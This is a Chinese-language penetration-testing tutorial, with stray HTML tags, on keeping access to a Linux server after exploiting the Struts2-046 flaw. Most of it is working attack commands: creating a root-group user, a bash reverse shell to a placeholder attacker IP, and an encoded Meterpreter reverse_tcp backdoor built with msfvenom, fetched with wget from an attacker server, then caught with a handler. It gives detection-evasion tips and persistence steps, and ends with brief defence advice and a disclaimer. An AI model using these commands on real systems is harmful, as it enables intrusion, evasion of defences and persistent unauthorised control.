Struts2漏洞利用与防火墙绕过技术详解<\/h1>

一、漏洞背景<\/h2>

本文介绍的是针对存在Struts2-046远程代码执行漏洞的系统进行渗透测试的过程。攻击者已确认目标系统存在该漏洞，并已获得root权限，但遇到了防火墙\/安全策略的限制：<\/p>

可以执行非交互性命令<\/li>
无法上传包含可执行代码的文件<\/li>

常规webshell上传失败（仅允许上传txt等文本文件）<\/li> <\/ul>

二、攻击思路分析<\/h2>

在受限环境下，攻击者提出了三种可能的攻击路径：<\/p>

直接添加用户<\/strong>：通过非交互命令添加用户并加入root组<\/li>
反弹shell<\/strong>：尝试建立交互式会话<\/li>

MSF后门<\/strong>：使用Metasploit生成编码后的Linux后门<\/li> <\/ol>
三、详细攻击步骤<\/h2>
思路一：直接添加用户<\/h3>

添加用户：<\/p>
useradd test <\/span><\/span><\/code><\/pre><\/li> 设置密码（非交互方式）：<\/p> echo "PASSWORD"<\/span> | passwd --stdin USERNAME <\/span><\/span><\/code><\/pre><\/li> 将用户加入root组：<\/p> usermod -g root test <\/span><\/span><\/code><\/pre><\/li> 验证用户：<\/p> id test <\/span><\/span><\/code><\/pre><\/li> <\/ol> 遇到的问题<\/strong>：虽然用户添加成功，但SSH连接时密码被拒绝。原因是passwd --stdin<\/code>在某些系统上不可靠。<\/p> 思路二：反弹shell<\/h3> 在攻击机开启监听：<\/p> nc.exe -vv -l -p [<\/span>端口]<\/span> <\/span><\/span><\/code><\/pre><\/li> 在目标机尝试bash反弹：<\/p> bash -i >& \/dev\/tcp\/[<\/span>攻击机IP]<\/span>\/[<\/span>端口]<\/span> 0>&1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 遇到的问题<\/strong>：防火墙拦截了反弹连接，尝试不同端口和方式均失败。<\/p> 思路三：MSF后门利用<\/h3> 1. 生成后门<\/h4> 对于Metasploit 4.2及以下版本<\/strong>：<\/p> msfpayload linux\/x86\/meterpreter\/reverse_tcp LHOST=[<\/span>IP]<\/span> LPORT=[<\/span>端口]<\/span> R | \ <\/span><\/span><\/span><\/span>msfencode -t elf -e x86\/shikata_ga_nai -c 3<\/span> -o \/root\/test <\/span><\/span><\/code><\/pre>对于新版Metasploit<\/strong>：<\/p> msfvenom -a x86 --platform linux -p linux\/x86\/meterpreter\/reverse_tcp \ <\/span><\/span><\/span><\/span>LHOST=[<\/span>IP]<\/span> LPORT=[<\/span>端口]<\/span> -e x86\/shikata_ga_nai -i 3<\/span> -f elf > \/root\/test <\/span><\/span><\/code><\/pre>参数说明：<\/p> -a x86<\/code>：32位架构<\/li> --platform linux<\/code>：目标平台<\/li> -p<\/code>：指定payload<\/li> -e x86\/shikata_ga_nai -i 3<\/code>：使用shikata编码3次（绕过检测）<\/li> -f elf<\/code>：输出为ELF格式<\/li> <\/ul> 2. 传输后门<\/h4> 使用wget从攻击者控制的服务器下载：<\/p> wget [<\/span>URL]<\/span> -O \/root\/test <\/span><\/span><\/code><\/pre>3. 设置权限<\/h4> chmod 777<\/span> \/root\/test <\/span><\/span><\/code><\/pre>4. 启动监听<\/h4> 在MSF控制台：<\/p> use exploit\/multi\/handler <\/span><\/span>set LHOST [<\/span>IP]<\/span> <\/span><\/span>set LPORT [<\/span>端口]<\/span> <\/span><\/span>set PAYLOAD linux\/x86\/meterpreter\/reverse_tcp <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>5. 执行后门<\/h4> .\/test <\/span><\/span><\/code><\/pre>6. 后续操作<\/h4> 获得meterpreter会话后：<\/p> 添加后门用户<\/li> 生成SSH密钥直接连接<\/li> 或直接使用MSF维持权限<\/li> <\/ul> 四、技术要点总结<\/h2> 编码重要性<\/strong>：shikata_ga_nai编码3次可有效绕过检测<\/li> 权限设置<\/strong>：必须给后门文件执行权限(chmod 777)<\/li> 环境适应<\/strong>：了解目标防火墙限制<\/li> 测试不同方法寻找突破口<\/li> <\/ul> <\/li> 备选方案<\/strong>：当直接添加用户失败时，考虑后门方式<\/li> 工具选择<\/strong>：根据Metasploit版本使用msfpayload或msfvenom<\/li> <\/ol> 五、防御建议<\/h2> 及时修补Struts2漏洞<\/li> 实施严格的防火墙规则：限制出站连接<\/li> 监控异常端口活动<\/li> <\/ul> <\/li> 文件上传限制：检查文件内容而不仅是扩展名<\/li> 禁止执行上传目录的文件<\/li> <\/ul> <\/li> 用户权限监控：审计用户添加操作<\/li> 限制root组权限<\/li> <\/ul> <\/li> <\/ol> 六、法律与道德声明<\/h2> 本文所述技术仅用于合法安全测试和研究目的。实际渗透测试必须获得明确授权，测试后应及时向管理员报告漏洞。未经授权的测试可能构成违法行为。<\/p>